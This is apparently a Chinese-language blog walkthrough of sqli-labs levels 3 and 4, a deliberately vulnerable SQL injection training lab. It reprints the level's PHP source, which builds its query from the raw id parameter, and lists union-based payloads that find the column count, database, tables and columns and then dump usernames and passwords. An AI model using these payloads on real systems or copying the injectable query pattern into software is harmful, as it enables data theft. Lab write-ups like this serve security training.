2. 程式人生 > >sqli-labs第3-4關 詳解

sqli-labs第3-4關 詳解

阿新 發佈:2020-10-08

通過第二關,來到第三關

我們用了前兩種方法,都報錯,然後自己也不太會別的注入,然後莫名的小知識又增加了。這居然是一個帶括號的字元型注入,

這裡我們需要閉合前面的括號。

$sql=select * from users where id=("$id");

但我們傳入的id為5')然後我們的語句就變成了

 

 而且頁面顯示正常,然後我們就去判斷欄位的列數,這個跟前三關應該是一樣的 ,我們直接

pyload: ?id=5')order by 4--+

然後判斷3的時候,沒有報錯,於是確定列數為3,具體為什麼要確定列數,在第一個wp中有提到,

https://www.cnblogs.com/junlebao/p/13758919.html點選這個就可以看到關於聯合查詢的知識點了

我們用聯合查詢,所以我們要保證列數字段一致,如果不一致則會報錯。

下面我們貼出原始碼

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-4 Error Based- DoubleQuotes String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);//函式從結果集中取得一行作為關聯陣列,或數字陣列,或二者兼有返回根據從結果集取得的行生成的陣列,如果沒有更多行則返回 false
	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

</font> </div></br></br></br><center>
<img src="../images/Less-4.jpg" /></center>
</body>
</html>

看原始碼裡面的函式,我給了註釋,這就是為什麼我們要將id的值給-1,我們需要將前面的資料便為空集,然後我們後面的資料就會呈現出來。

說完了這個,我們接著下一步操作:

1. 爆庫名  ?id=-1') union select 1,2,database()--+

2. 爆表名  ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

3. 爆欄位  ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

4. 爆資料  ?id=-1') union select 1,2,group_concat(0x5c,username,0x5c,password) from users--+

然後就查到了我們想要的users表中的資料了。

 之後我們又來到了第四關,發現第四關只是將單引號變成了雙引號了,所以我們

pyload:?id=5")--+

然後發現頁面正常顯示,沒有報錯,於是我們用order by來判斷列數,步驟和第三題一樣。

希望可以對讀者有幫助,不對的希望大家多多指正,大家共同進

相關推薦

sqli-labs3-4

通過第二關,來到第三關 我們用了前兩種方法,都報錯,然後自己也不太會別的注入,然後莫名的小知識又增加了。這居然是一個帶括號的字元型注入, 這裡我們需要閉合前面的括號。 $sql=select * from users where id=("$id"); 但我們傳入的id為5')然後我們的語句就變成了 &n

clucene2.3.3.4編譯

最近總是有人給我留言,說Clucene編譯不過去,大概是因為我以前發的一篇筆記的影響吧 這不,今天又有人問了,所以抽點時間,寫一下我編譯的過程,希望能幫助大家。 一、首先在sourceforge上下載clucene-core-2.3.3.4 ,在目前這是最新版本的 二、

sqli-labs第二

學會了第一關,時隔多天來到了第二關,怎麼說了沒有看wp就給做出來了。 首先,我是自己先判斷了下,這個是什麼注入 ?id=1'  不行 ?id=1' or '1'='1--+  也不行 然後又嘗試了下 ?id=1 and 1=1  頁面顯示正常 ?id=1 and 1=2  頁面又錯誤回顯 然後這就是數字注入了

Centos7.3配置Apache2.4+mysql5.7+php5.4環境

在買好伺服器並在伺服器上建立例項後就要開始配置你的伺服器了,將個人配置伺服器的一些經驗記錄如下: 檢視安裝的作業系統的版本:lsb_release -a 配置Centos7.3_64+Apache2.4_mysql5.7_php5.4環境有一個詳細的教程: Cento

Struts2學習三課 Struts2

request end apach -1 sso struts2 input div available 接著上次的課程 這次我們看struts.xml 修改如下:這裏是加上命名空間,默認的是不加,我們手動加上時就要在訪問時加上命名空間。 <?xml version

AFNetworking 3.0 使用 和 源碼解析實現原理

數據 syn ria 特定 style conn afn rda gre AFN原理&& AFN如何使用RunLoop來實現的: NSString * requestURL = @"http://119.254.98.136/api/v1/web/

SQLi-LABS Page-3(Basic Challenges)

htm from lean bool pan -- info blog lec sqlmap: python sqlmap.py -u "http://mysqli/Less-3/?id=1" ---Parameter: id (GET) Type: bo

計算機網絡(NETWORK 部分二) 3-4

路由交換技術 mac地址 交換機工作原理 Day 03 1. T568A 和 T568B 的順序?哪些負責發送,哪些負責接收? T568A 線序:白綠,綠,白橙,藍,白藍,橙,白棕,棕 T568B 線序:白橙,橙,白綠,藍,白藍,綠,白棕,棕 1,2 發送,3,6 接收2. 什麽叫標準網線?什麽叫

Elasticsearch 5.4 Mapping

targe AI ref last OS clas class 5.4 blog 這裏面講解的mapping說的很清楚了。 http://blog.csdn.net/napoay/article/details/73100110 修改mapping就比較坑了:

網絡互聯技術(四)-LSA的四和五種類型

實驗 如何 分享 bsp ip地址 系統 計算 互聯 reference LSA的第四和第五種類型詳解 一、External LSA:第五種LSA   我們前面已經詳細介紹了前面三種LSA,今天就接著介紹第四種和第五種LSA。因為理解ASBR Summary LSA——

PHP定時執行任務的3種方法

round 利用 淮北 執行 多線程 href 等待 無限 exec 轉載 https://www.jb51.net/article/76720.htm 更新時間:2015年12月21日 10:38:56 作者:PHP淮北 我要評論PHP不支持多線程,有時候處理問

Grunt學習筆記【3】---- filter

add 行處理 class 一個 特殊 col filter詳解 很多 https 本文主要講配置任務中的filter,包括使用默認fs.Stats方法名和自定義過濾函數。 通過設置filter屬性可以實現一些特殊處理邏輯。例如:要清理某個文件夾下的所有空文件夾,這時使用c

一個SpringMVC程式

建立一個java類: package com.myproject.cn; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org

android平臺下OpenGL ES 3.0例項頂點屬性、頂點陣列

OpenGL ES 3.0學習實踐 android平臺下OpenGL ES 3.0從零開始 android平臺下OpenGL ES 3.0繪製純色背景 android平臺下OpenGL ES 3.0繪製圓點、直線和三角形 android平臺下OpenGL E

android平臺下OpenGL ES 3.0例項頂點緩衝區物件(VBO)和頂點陣列物件(VAO)

OpenGL ES 3.0學習實踐 android平臺下OpenGL ES 3.0從零開始 android平臺下OpenGL ES 3.0繪製純色背景 android平臺下OpenGL ES 3.0繪製圓點、直線和三角形 android平臺下OpenGL E

keras:3)Embedding層

Embedding層 keras.layers.embeddings.Embedding(input_dim, output_dim, embeddings_initializer='uniform', embeddings_regularizer=None, activity_re

大話設計模式C++實現-3.4.5-設計原則(1)

第三章-單一職責原則 (1).就一個類而言,應該僅有一個引起它變化的原因。 (2)如果一個類承擔的職責過多,就等於把這些職責耦合在了一起,一個職責的變化可能會削弱或者抑制這個類完成其他職責的能力。這種耦合會導致脆弱的設計,當發生變化時,設計會遭受到意想不到的破壞。 (3)軟體設計真正要做

Djangon五篇-----模型

目錄 前言 配置資料庫 使用 Python 定義模型的好處 建立模型 資料的基本訪問 插入和更新資料  過濾資料  檢索單個物件 排序資料  鏈式查詢  切片資料 在一個語句中更新多個物件  刪除物

Vue CLI 3搭建專案

vue cli 3 介紹 上次用vue的時候,vue cli的版本還是2,對應指令還是 vue init < 模板名稱 > < 專案名稱 > vue-cli提供的模板有: webpack 一個全面的web

3、CAN--基礎知識

基礎知識 一、背景 二、發展 三、匯流排優點 四、匯流排要點 1、CAN的應用 (1)車載網路構想 (2)應用例項 (3)連線圖 2、CAN協議基本概念